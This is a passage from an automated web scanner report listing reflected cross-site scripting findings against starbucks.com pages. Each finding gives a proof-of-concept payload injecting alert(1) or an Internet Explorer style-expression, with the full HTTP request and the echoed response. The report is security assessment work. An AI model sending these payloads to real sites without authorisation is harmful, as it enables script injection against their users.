HTTP/1.1 200 OK Content-Length: 33805 Content-Type: text/html;charset=UTF-8 Expires: Tue, 08 Feb 2011 02:34:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 08 Feb 2011 02:34:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... <script type="text/javascript" src="http://publish.vx.roo.com/nypost/flashportal/20100911/embed/?vxSiteId=0db7b365-a288-4708-857b-8bdb545cbd0f&vxTemplate=NYPost_Main.swf&vxChannel=PostTopFilmStrip706db"><script>alert(1)</script>6cdcd614a58&customBanner=http://www.nypost.com/rw/SysConfig/WebPortal/nypost/images/title.png&vxClickToPlay=false"> ...[SNIP]...
1.610. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95116"%3balert(1)//81dd21ba950 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95116";alert(1)//81dd21ba950 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?95116"%3balert(1)//81dd21ba950=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:13:59 GMT Connection: close Content-Length: 41116
1.611. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9ce4"style="x:expression(alert(1))"c1e3c89638a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:13:55 GMT Connection: close Content-Length: 41173
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <a href="http://www.addthis.com/bookmark.php?v=250&username=starbucks&url=http://www.starbucks.com/?a9ce4"style="x:expression(alert(1))"c1e3c89638a=1" class="addthis_button_compact" title="Post to AddThis"> ...[SNIP]...
1.612. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/about-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9592"style%3d"x%3aexpression(alert(1))"d1e7701208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9592"style="x:expression(alert(1))"d1e7701208 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us?a9592"style%3d"x%3aexpression(alert(1))"d1e7701208=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:13:39 GMT Connection: close Content-Length: 38564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us?a9592"style="x:expression(alert(1))"d1e7701208=1" /> ...[SNIP]...
1.613. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/about-us/company-information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48515"style%3d"x%3aexpression(alert(1))"882196566b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48515"style="x:expression(alert(1))"882196566b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us/company-information?48515"style%3d"x%3aexpression(alert(1))"882196566b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:20:01 GMT Connection: close Content-Length: 39249
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us/company-information?48515"style="x:expression(alert(1))"882196566b=1" /> ...[SNIP]...
1.614. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6624b"style="x:expression(alert(1))"6dff94306a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us/company-information/online-policies/privacy-statement?6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:20:44 GMT Connection: close Content-Length: 52934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement?6624b"style="x:expression(alert(1))"6dff94306a9=1" /> ...[SNIP]...
1.615. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c1"style="x:expression(alert(1))"405a7c3edc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us/company-information/online-policies/terms-of-use?177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:21:24 GMT Connection: close Content-Length: 68896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use?177c1"style="x:expression(alert(1))"405a7c3edc3=1" /> ...[SNIP]...
1.616. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30cc8"style="x:expression(alert(1))"6c461a50f50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us/company-information/online-policies/web-accessibility?30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:20:20 GMT Connection: close Content-Length: 39352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility?30cc8"style="x:expression(alert(1))"6c461a50f50=1" /> ...[SNIP]...
1.617. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/about-us/company-information/product-advisories
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cd5c"style="x:expression(alert(1))"3d37d7257db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us/company-information/product-advisories?4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:20:06 GMT Connection: close Content-Length: 38510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us/company-information/product-advisories?4cd5c"style="x:expression(alert(1))"3d37d7257db=1" /> ...[SNIP]...
1.618. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/about-us/our-heritage
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cfef"style="x:expression(alert(1))"1c51ac66bf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us/our-heritage?5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:20:04 GMT Connection: close Content-Length: 37603
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us/our-heritage?5cfef"style="x:expression(alert(1))"1c51ac66bf6=1" /> ...[SNIP]...
1.619. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/business
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8439b"style="x:expression(alert(1))"d1ac5f7cb9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /business?8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:20:27 GMT Connection: close Content-Length: 36606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/business?8439b"style="x:expression(alert(1))"d1ac5f7cb9a=1" /> ...[SNIP]...
1.620. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/business/foodservice
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56659"style%3d"x%3aexpression(alert(1))"563fe89e48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56659"style="x:expression(alert(1))"563fe89e48e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /business/foodservice?56659"style%3d"x%3aexpression(alert(1))"563fe89e48e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:21:28 GMT Connection: close Content-Length: 35775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/business/foodservice?56659"style="x:expression(alert(1))"563fe89e48e=1" /> ...[SNIP]...
1.621. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/business/international-stores
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45cc2"style="x:expression(alert(1))"db7f4597e3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /business/international-stores?45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:21:12 GMT Connection: close Content-Length: 36211
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/business/international-stores?45cc2"style="x:expression(alert(1))"db7f4597e3f=1" /> ...[SNIP]...
1.622. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/business/licensed-stores
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4641a"style%3d"x%3aexpression(alert(1))"960dd899042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4641a"style="x:expression(alert(1))"960dd899042 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /business/licensed-stores?4641a"style%3d"x%3aexpression(alert(1))"960dd899042=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:21:26 GMT Connection: close Content-Length: 35650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/business/licensed-stores?4641a"style="x:expression(alert(1))"960dd899042=1" /> ...[SNIP]...
1.623. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/business/office-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c588f"style="x:expression(alert(1))"7c2218a24c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /business/office-coffee?c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:20:44 GMT Connection: close Content-Length: 37633
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/business/office-coffee?c588f"style="x:expression(alert(1))"7c2218a24c5=1" /> ...[SNIP]...
1.624. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd912"style="x:expression(alert(1))"c7bd23ee043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /career-center?cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:22:13 GMT Connection: close Content-Length: 42847
